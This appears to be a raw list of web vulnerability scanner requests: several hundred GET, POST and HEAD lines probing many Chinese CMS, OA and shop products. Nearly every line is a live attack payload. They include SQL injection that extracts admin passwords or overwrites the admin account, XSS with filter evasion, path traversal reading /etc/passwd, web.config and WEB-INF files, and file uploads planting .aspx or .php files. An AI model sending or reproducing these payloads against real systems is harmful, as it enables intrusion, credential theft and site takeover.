GET /plugins/phpdisk_client/passport.php?YWN0aW9uPXBhc3Nwb3J0bG9naW4mdXNlcm5hbWU9MSZwYXNzd29yZD0xJnNpZ249NjdBMTAwNDc5QTQ4OTMyOUEzMTIxRUM0QTM2M0FBNzcmdHBmPXBkX3VzZXJzIHdoZXJlIGdpZD0xIGFuZCAoYXNjaWkoc3Vic3RyaW5nKChzZWxlY3QgdXNlcm5hbWUgZnJvbSBwZF91c2VycyB3aGVyZSBnaWQ9MSBsaW1pdCAwLDEpLDEsMSkpPTk4KSBsaW1pdCAwLDEj
POST /api.php?act=search_sub_regions&api_version=1.0
GET /index.php?c=com_index&m=yp&userid=12%22%3E%3Ciframe%20src=javascript:alert(42873)%3E
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%22%20onmouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%22%20onmouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%22%20onmouseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%22%20onmouseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%22%20onmouseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%22%20onmouseover=alert(42873)%20y=&zone=3363
GET /index.php?m=yp&c=index&a=lists&areaid=37%20%20onmouseover%3Dprompt%2842873%29%20&catid=10&price=1_500&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=37&catid=10&price=%22%20onmouseover=prompt(42873)%20&page=1&order=4
GET /index.php?m=yp&c=index&a=lists&areaid=12&catid=114&price=&tid=1%22%20onmouseover=prompt(42873)%20&page=1&order=1
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=4%20onmonmouseoverouseover=alert(42873)%20y=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=2000_3000%20onmonmouseoverouseover=alert(42873)%20y=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing%20onmouonmouseoverseover=alert(42873)%20y=&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=4_100%20onmouonmouseoverseover=alert(42873)%20y=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=336
GET /index.php?a=lists&agent=2%20onmoonmouseoveruseover=alert(42873)%20y=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=&zone=3363
GET /index.php?a=lists&agent=&bedroom=&c=index&catid=8&city=beijing&m=content&page=&pay_type_int=&price=&rent_mode=2%20onmoonmouseoveruseover=alert(42873)%20y=&zone=3363
GET /manage/WAP/Other/AddDalen.aspx?menu=add
GET /login.php?SSL_CLIENT_S_DN_Email=%27+or+1=%28select+1+from+%28select+count%28*%29,concat%28%28SELECT+md5%281122%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29%23/wapc/5000_0005_003
GET /install/step4.aspx
HEAD /DataBase/%23zhi_rui_v_Base.mdb
GET /manage/Shop/profile/LmUserManage.aspx
GET /API/GetPageHtml.aspx
GET /stat/stat.aspx?statid=1'%20And%201=(select%20db_name())%20--
GET /manage/Zone/TemplateList.aspx?OpenerText=a');%7Dalert(42873);%7B//
GET /msgChat/download.jsp?url=msgChat/download.jsp
GET /admin.php
GET /index.php?m=wap&siteid=1&a=big_image&url=aHR0cDovL3hzc3Rlc3QuY29tIiBvbmVycm9yPSJqYXZhc2NyaXB0OmFsZXJ0KDQyODczKTs=
POST /index/searchInfoTcontentByCategory.action
POST /emlib4/system/datasource/selectrecordset.aspx
POST //index.php?app=main&func=common&action=commonJob&act=getAllUserListsInDeptTree&group=getGroupMember
GET /home.php?action=article&id=1&mytypeId=-2%20union%20select%20concat(0x7e,md5(1122),0x7e)%20from%20v_user%20where%20uid=1
GET /web/common/getfile.jsp?p=..%5C%5C..%5C%5C..%5C%5C..%5C%5Cetc%5C%5Cpasswd
GET /ResultXml.aspx?column=banner&table=sys.v_$version%20where%20rownum=1--&k=jwc
GET /index.php/list-10%20UNION/**/all/**/SELECT/**/listid,listid1,modelid,siteid,norder,ncount,ncountall,(select%20concat(0x23,md5(1122),0x23)%20from%20kc_admin%20where%20adminid=1),klistname,kkeywords,kdescription,kimage,isblank,iscontent,kcontent,klistpath,ktemplatelist1,ktemplatelist2,nlistnumber,kpathmode,ktemplatepage1,ktemplatepage2,npagenumber,ispublish1,ispublish2,norder1,norder3,norder4,norder5,nupdatelist,nupdatepage,isexist,nlist,npage,gid,ismenu1,ismenu2,ismenu3,ismenu4,ismenu5,ismap,klanguage,gidpublish%20from%20king_list%20where%20listid=4%23.html
GET /index.php?m=video&c=video_for_ck&a=add_f_ckeditor&vid=1&title=1122&description=a%E9%8C%A6%27,0,0,0,0,0,%28select%20%281%29%20from%20mysql.user%20where%201=1%20aNd%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%29%29%23
GET /customform/CustomFormList.aspx?pageindex=1&divid=530602186870.fs_sys_user%20where%201=(select%20username%20%20from%20fs_sys_user%20where%20id=1);--.1.1
GET /module/AIP/upload.php?T_ID=1&RUN_ID=1%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/logincheck.php?USEING_KEY=2&USERNAME=abc%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
POST /module/AIP/upload.php?RUN_ID=1&T_ID=1
GET /general/score/flow/scoredate/result.php?FLOW_ID=11%bf%27%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20user%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /general/workflow/list/input_form/data_fetch.php?run_id=1%20and%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),(substring((select%20md5(1122)%20from%20%60user%60%20limit%201),1,62)))a%20from%20information_schema.tables%20group%20by%20a)b)%23
GET /pda/auth.php?P=%60%df'and%20(select%201%20from%20%20(select%20count(*),concat((select%20md5(1122)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23&PASSWORD=test
GET /logincheck.php?USEING_KEY=2&USERNAME=cfreer%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/go.php?LOGIN_UID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /ispirit/check_secure_key.php?USERNAME=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /interface/auth.php?&PASSWORD=1&USER_ID=%df'%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /module/sel_seal/get.php?ID=%df'and%20(select%201%20from%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20user%20limit%201),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /portal/group/articl.php?portal_id=3&column_id=3&content_id=184)%20and%20(select%201%20from%20(select%20count(*),concat(0x3a,md5(1122),0x3a)x%20from%20information_schema.tables%20group%20by%20x)a)%20and%20(1)=(1
POST /index.php?m=company&s=admin/business_info_list
GET /index.php?case=manage&act=delete&manage=orders&guest=1&id=-1
POST /getpwd4.asp
GET /?m=offer&s=offer_list&id=1-webscan%23
POST /MemberLogin.asp
GET /views.asp
GET /basket.asp?h%77_id=513%20and%201=2
GET /protextbox.asp?hw_%69d=513%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,chr(88),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%20from%20admin
POST /index.php?app=tag&ac=add&ts=do
GET /member/index.php?ugid31=51'%20and%20'1122'='12
GET /siteserver/cms/console_tableMetadata.aspx?ENName=cms_Content%27%29%20and%200%3C%28select%20top%201%20isnull%28cast%28%5Breer1122%5D%20as%20nvarchar%284000%29%29%2Cchar%2832%29%29%20from%20bairong_Administrator%20where%201%3D1%20and%20UserName%20not%20in%20%28select%20top%200%20UserName%20from%20bairong_Administrator%20where%201%3D1%20group%20by%20UserName%29%29%3B--
GET /UserCenter/platform/user.aspx?page=2&UnLock=True&UserNameCollection=1')%20and%200%3C(select%20webscan);--
GET /search.php?mod=information&ids=1-webscan&catid=1
POST /box.php?
GET /siteserver/cms/modal_contentTagAdd.aspx?PublishmentSystemID=2109&TagName=1111'%20and%20char(106)=0%20--
GET /siteserver/UserRole/background_userAdd.aspx?UserName=1122'%20and%20char(106)%20=1%20--&ReturnUrl=../cms/console_user.aspx
GET //siteserver/cms/background_channelsGroup.aspx?publishmentSystemID=1615&nodeGroupName=1122'%20and%20char(106)%20=1%20--
GET /siteserver/cms/modal_contentGroupAdd.aspx?PublishmentSystemID=2222&GroupName=123'%20and%20char(106)=1%20--
GET /downLoadFile.action?filePath=/WEB-INF/web.xml
GET /siteserver/UserRole/modal_userView.aspx?UserName=dd'%20and%201=char(106);--
GET /SubmmitOrderHandler.aspx?Action=GetUserShippingAddress&ShippingId=2
GET /job/job.php?lang=cn&id=2&settings[met_column]=met_admin_table%20where%201=2--%201
GET /searchLines.aspx?LName=h%25';
GET /ProductBuy.Asp
GET /newssearch.aspx?skey=1%25'%20and%201=char(106)%20--
GET /searchLines.aspx?LName=h&t=webscan()'
GET /viewlist.aspx?typeid=webscan()'
GET /company/index.php?datetime=&page=2&position=&profession=&type=1%20and%201=2&workadd=
POST /resource/avatar/avatar.php?a=uploadavatar&input=uid%3D1122.php
GET /?mod=account&code=Login_callback&cmd=a&from=../../../robots.txt%00
GET /admin/admin/getpassword.php?action=next4&abt_type=2&password=123456&passwordsr=123456&array[0]=reer1122
GET /index.php?index=a&skin=default/../&dataoptimize_html=/../../templates/default/images/css/metinfo.css
GET /gallery--p,0,1122%20and%200-0---1.html
GET /?m=info.detail&id=1-webscan
GET /misc.php?mod=getuserinfo&uid=-1
POST /?m=city.getSearch&index=reer
GET /?m=info&rewrite=1'%20union%20select%201,concat(0x23,md5(1122),0x23)%20from%20my_admin%20where%20id=1%20--%20a
GET /admin_aspcms/_content/_Spec/AspCms_SpecAdd.asp
POST /index.php?act=ajax&do=datacall&in_ajax=1&m=index&op=get_datacall
GET /Product.asp
POST /user/getpassword.asp
GET /admin_aspcms/_expand/_form/AspCms_FormFun.asp?action=del&FormField=reer&id=1122
POST /plus/ajax_user.php?act=check_email
POST /plus/ajax_user.php?act=check_usname
GET /HitCount.asp?LX=reer%20where%201=1%20union%20select%20Password%20from%20Admin
GET /ScoreProductSearchList.html?ProductCategoryID=12%20and%20%20@@version=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=2&Score2=3%20and%20char(106)=1%20--
GET /ScoreProductSearchList.aspx?ProductCategoryID=12&Score1=3%20and%20char(106)=1%20--
GET /index.php?app=user&ac=plugin&in=../../robots.txt%00
POST /member.php?act=login&op=forget
GET /item.php?act=search&keyword=%d5'%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20distinct%20concat(0x7e,0x27,char(99,102,114,101,101,114),0x27,0x7e)%20FROM%20information_schema.schemata%20LIMIT%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23&searchsort=subject&catid=0&ordersort=addtime&ordertype=asc&searchsubmit=yes
GET /?product-75-1@%7C1122%22%3E%3Ciframe%20src=javascript:this[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](%2242873%22)%20-index.html
GET /index.php?product-%22%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20-1122-viewpic.html
GET /?gallery-1--1--'%20%3E%3Ciframe%20src=javascript:window[%22%5Cx61%5Cx6c%5Cx65%5Cx72%5Cx74%22](42873)%20'--grid.html
GET /index.php?act=show_groupbuy&op=groupbuy_list&groupbuy_area=&groupbuy_class=&groupbuy_price=1&groupbuy_order_key=price&groupbuy_order=asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23
GET /index.php?act=search&key=click&order=desc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&cate_id=8
GET /wap/index.php
GET /deals?end_time=1&searchName=%25'%20AND%201=1%20AND%20'%25'='&start_time=1
GET /statistics.php?pageurl=pageurl&referer=http://www.baidu.com/?wd=aaaa%2527),((select%201%20from%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a),2,3,4,5,6,7,8,9)%23
GET /member/index.php
GET /wap/index.php?mod=space&userid=1'%20and%20extractvalue(1,(select%20md5(1122)from%20my_admin%20limit%201));%20%23
GET /index.php?act=index&op=list&city_id=1&area_id=&mall_id=&class_id=3&class_id_1=22&pconsume=&orderby=add_time%20asc,%20(SELECT%201%20from%20(select%20count(*),concat(floor(rand(0)*2),%20md5(1122))a%20from%20information_schema.tables%20group%20by%20a)b);%23&sort=asc
POST /video.php
POST /news.php?classid=2
GET /ajax.php?action=dig&module=members%20set%20username=00000,password=0x3235306366386235316337373366336638646338623462653836376139613032%20where%20uid=1%20--%20a
GET /count.php?type=news%20SET%20views%20=%20views-1%20WHERE%20id=1%20and%201=(updatexml(1,concat(0x5e24,(select%20concat(0x3a,md5(1122),0x3a)%20from%20boka_members%20where%20uid=1),0x5e24),1))--+&&action=showcount&id=1
POST /ajax.php?action=contentpage
GET /comments.php?id=3a&tablepre=boka_ckck
GET /rss.php?module=news&attasql=union%20select%201,reer,3,4%20from%20boka_members%20where%20uid=1%20order%20by%20id%20asc%20%20--%20a
GET //wap/board.php?filter=3%20union%20select%201,2,3,4,webscan,6,7,8,9,10,11,cfreer,13,14,15,16,17,18,19,20,21,22%20from%20boka_members%20where%20uid=1%20--%20a&classid=1a&digest=1
GET /admin/index.php?_m=../template/css/login.css%00&_a=admin_list
GET /case/?settings[met_img]=met_admin_table%20where%201=1%20--%201
GET /login.aspx?test=TestSystem&password=1122&oid=2%20and%202=(convert(int,char(106)))&uid=1
GET /info.php?fid=1&tblprefix=cms_msession%20and%201=reer%20--
POST /ajax.php?action=letter&letter=a
GET /index.php?q=1%25%2527%2520and%25201%253D2%2520%2523&do=search&action=lists&module=product
GET /index.php?action=detail&do=offer&title=%2527or%25201%253D2%2523
GET /index.php/Index/index/name/$%7B@print(md5(1122))%7D
GET /index.php?m=news&s=admin/newslist&submit=%E5%88%A0%E9%99%A4&did=999%29%20and%20%28SELECT%201%20from%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select%28selEct%20concat%28user,0x7c,password%29%20from%20f10bd198561acb0197452013b7a82429%20limit%200,1%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%23
POST /index.php?m=payment&s=admin/pickupmod
GET /admin/receive.php?signMsg=0FEBF34C4A2EBF825F60025D6C0576F2&version=%3Cobject%20data=data:text/html;base64,PHNjcmlwdD5hbGVydCg0Mjg3Myk8L3NjcmlwdD4=%3E
GET /user/City_ajax.aspx?Cityid=-1'%20%20union%20%20SELECT%20'webscan',2%20FROM%20fs_sys_User%20WHERE%20id=7%20%20and%20'1'='1
HEAD /servlet/ShowPic?filePath=/tomcat/webapps/ROOT/WEB-INF/web.xml
POST /mep-admin/DcServlet
GET /mep-admin/userAction!queryUser.action?start=0&limit=10
GET /admin/picupload.aspx
GET /manager/picupload.aspx
GET /microshop/index.php?act=api&op=get_personal_commend&data_count=1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13,concat(0x7c,md5(1122),0x7c),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46%20from%20shopnc_admin
POST /TreeDialogController.zc?backId=buyer_id_0&backName=buyer_name_0&dialogType=radio&method=getBuyerDialog&tempBackId=temp_buyur_id_0&tempBackName=temp_buyer_name_0
GET /admin.php?c=ajax&f=exit&filename=opt&group_id=1%20union%20select%203,1,0,md5(1122),account,6%20from%20qinggan_adm%20where%20id%20like%201%23&identifier=1
GET /index.php?c=tj&f=include&js=/../../config.php
GET /index.php?c=ueditor&f=remote_image&upfile=http://0.0.0.0/reer.php
GET /api.php?c=opt&f=index&group_id=-1%20union%20select%201,2,0,md5(1122),5,6&identifier=reer
GET /radcontrols/editor/dialog.aspx?dialog=ImageManager&editorID=');%3C/script%3E%3CScRiPt/acu%20src=1%20onerror=alert(42873)%3E%3C/ScRiPt%3E%3Cscript%3E//&language=zh_CN&sessionID2=8ca6abaf-d361-328c-9178-%20f78311cd0329&UseEmbeddedScripts=yes&useSession=0
GET /system/nhome/login.jsp?message=%22)--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
GET /cgi/index.cgi?error=badlogin&__mode=show_login%27%22%28%29%26%25%3CScRiPt%20%3Ealert%2842873%29%3C%2fScRiPt%3E
GET /
GET /styles/outlook1/tools/calendar/calEditEvent.php?action=edit%22%3E%3Cscript%3Ealert(42873)%3C/script%3Ebad=%22&calid=
GET /web/User_Sort_List.aspx?infoid=2%20and%20char(106)=0
GET /forgetbf.asp?errstr=--%3E%3C/script%3E%3Cscript%3Ealert(42873)%3C/script%3E
POST /Ajax_Handle/UploadAttachmentHandler.ashx
GET /Web/Exam_List.aspx?typeid=18%20or%20(char(106)=0)
POST /Ajax_Handle/UploadPictureHandler.ashx
POST /Ajax_Handle/UploadLocalVideoHandler.ashx
POST /index.php?m=api&a=userpreview
POST /index.php?m=Appmanager&a=loadapp
POST /CMSUploadFile.aspx
POST /api/shop.aspx
GET /sysinfo.jsp
GET /login/Log.aspx?loginname=/**/'/**/and/**/char(106)%3E0/**/--
GET /login/publicpage.aspx?infotype=InfoZWGK_zwgk'/**/and/**/char(106)%3E0/**/--&dic_name=
HEAD /file/MyDownLoad.ashx?path=../web.config
GET /file/PackagDownload.ashx?sessionId=../../../../../webscan.txt
GET /broadcast/displaynewspic.aspx?id=1/**/and/**/1=char(106)/**/
GET /feedback/processvalue.aspx?num=e'/**/and/**/char(106)%3E0%20--
GET /channel/QueryHig.aspx?AcceptDept=&AppBusinessName='/**/and/**/char(106)%3E0/**/%20--%20
GET /login/proexamineview.aspx?ActivityInstanceId='/**/and/**/user/**/%3E0/**/--
GET /api.php?op=video_api&pc_hash=test%22/%3Ec%3Cscscriptript%3Ealert(42873)%3C/scscriptript%3E&&do_complete=1&uid=1&snid=1
HEAD /FileDownloadServlet?websiteId=1&templateName=/&fileNames=../../WEB-INF/config/db/dataSource.xml
GET /setup/setup1.jsp
GET /examlist/id-12,pid-104,key-%27and(char(106)=0)or%271%27=%27.aspx
GET /Article/?Type=18%20/**/and/**/1=char(106)--
GET /login/TransactList.aspx?ItemName='/**/and/**/1=char(106)/**/--
HEAD /file/EmailDownload.ashx?url=~/web.config&name=web.config
HEAD /file/UDFDownLoad.ashx?path=~/Global.asax&name=Global.asax
HEAD /file/DownLoad.ashx?path=~/Routes.config
GET /file/FileUpload.asmx/UploadFileBase64?url=~/Content/cesi.aspx&data=VGhpcyBpcyBhIHRlc3QgLSBieSBjZnJlZXIgd2Vic2Nhbg%3D%3D&status=0
GET /file/FileUpload.asmx/CopyFile?sourcePath=/web.config&targetPath=/Content/reer.txt&overwrite=true
HEAD /download.jsp?path=WEB-INF/&name=web.xml
HEAD /page/upload/down_file.jsp?fileName=ljer.gif'%20or%20'1'='2
POST /mx_form/order_save.php
POST /index.php?app=tag&ac=add&ts=do
GET /member.php?act=index
GET /Article/?KeyWord=1'%20and%201=char(97)%20--
HEAD /apas/portal/tableDownload/download.jsp?tmpfilename=../index.jsp
GET /admin/payonline.php?act=login&table=information_schema.SCHEMATA%20where%201=(select%201%20from%20%20(select%20count(*),concat(version(),0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
GET /frame/help/read_help.php?HELP_ID=-1%20union%20select%201,2,3,concat(0x7c,md5(1122),0x7c),5,6
GET /Channel/SearchResult.aspx?ItemName=1'%20or%201%3Echar(106)%20--
GET /Broadcast/Broadcast.aspx?type='%20or%201=char(106)%20--
GET /Broadcast/BroadcastView.aspx?type=InfoTPXW&InfoId=1122'%20and/**/1=char(106)--
GET /Channel/ChannelList.aspx?a=a&LicenseType=2'%20and/**/1=char(106)--
HEAD /jvideo/down.jsp?pathfile=/WEB-INF/ini/merpserver.ini%00.flv
HEAD /jiep/down.jsp?pathfile=down.jsp%00.txt
GET /index.php?m=Goods&a=showcate&id=1'cfreer
GET /Goods-showcate-id-1.html'cfreer
GET /pages/search_disk_usage.php?archive=a'%20and%20(SELECT%201%20FROM%20(select%20count(*),concat(floor(rand(0)*2),(SELECT%20md5(1122)%20from%20user%20limit%200,1))a%20from%20information_schema.tables%20group%20by%20a)b)%20and%20'1'='1
POST /jvideo/objectbox/selectx_userlist.jsp
GET /yhzc/NewFile.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isPass.jsp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /yhzc/isFlag.jsp?loginname=admin'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/Businessview.aspx?infoFlowId=0'%20and/**/1=char(106)%20--
GET /Bulletin/ColumnList.aspx?LanMuId=1'%20and/**/1=char(106)%20--
GET /Channel/TableDownLoadList.aspx?deptid=0011')%20and/**/1=char(106)--
GET /celerityAlleywayDetail.do?type=7'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
GET /Bulletin/DocmentDownload.aspx?ID=1122'%20and/**/1=char(106)--
GET /ViewSource/SrcStencilList.aspx?listType=1&SerailNO=11xxxxxxxx&buqiId=22&infoflowId=1122'%20and/**/1=char(106)--
GET /ViewSource/ProExamineView.aspx?ActivityInstanceId=0&ActivitySchemeGuid=00000000-0000-0000-0000-00000000000'--
GET /burgherServiceDetail.do?bs=1&serviceType=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /yushouli/yushouliResult.do?item_ID=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /indexGetDatags.do?depNO=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /bqbzDetail.do?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20AND%20'1122'='1122
GET /counter/counter2.php?id=(select%201%20from%20(select%20count(*),concat((select(select%20concat(cast(concat(0x7e,md5(1122))%20as%20char),0x7e))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)
GET /oa_server/App_Pages/App_page/UserSpuerAdd.aspx
GET /oa_server/App_Pages/App_page/user_list.aspx
POST /cms/cms/site/cms_site_template_upload.jsp?action=save
GET /cai_study.asp?FN=cai/test.flv&cls_no=&cai_no=lzgy&stu_no=1122'%20and%201=char(106);--
